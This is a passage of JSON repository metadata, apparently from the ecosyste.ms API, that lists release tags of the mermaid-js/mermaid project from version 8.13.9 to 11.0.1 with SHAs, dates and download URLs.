ithub.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms